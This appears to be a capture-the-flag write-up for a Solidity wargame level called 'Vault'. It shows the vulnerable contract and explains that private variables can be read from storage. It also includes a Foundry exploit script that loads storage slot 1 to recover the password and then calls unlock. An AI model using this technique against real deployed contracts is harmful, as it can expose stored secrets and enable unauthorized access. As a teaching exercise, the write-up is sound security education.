Level 8 - Vault ⏺⏺
Level Setup
Level Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Vault {
bool public locked;
bytes32 private password;
constructor(bytes32 _password) {
locked = true;
password = _password;
}
function unlock(bytes32 _password) public {
if (password == _password) {
locked = false;
}
}
}
Exploit
Private variable aren't secret, they are just not accessible by other smart contracts directly during smart contract execution. They can be read directly from the storage slots.
Use foundrys
vm.load
cheatcode to get the data in the slot.
make anvil-exploit-level-8
<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;
import {Script, console} from "forge-std/Script.sol";
import {HelperFunctions} from "script/HelperFunctions.s.sol";
interface IVault {
function unlock(bytes32 _password) external;
}
// ================================================================
// │ LEVEL 8 - VAULT │
// ================================================================
contract Exploit is Script, HelperFunctions {
function run() public {
address targetContractAddress = getInstanceAddress();
IVault targetContract = IVault(targetContractAddress);
bytes32 password = vm.load(targetContractAddress, bytes32(uint256(1)));
console.log("Password: %s", bytesToString(password));
vm.startBroadcast();
targetContract.unlock(password);
vm.stopBroadcast();
}
}
Submit instance... 🥳
Completion Message
Notes
Last updated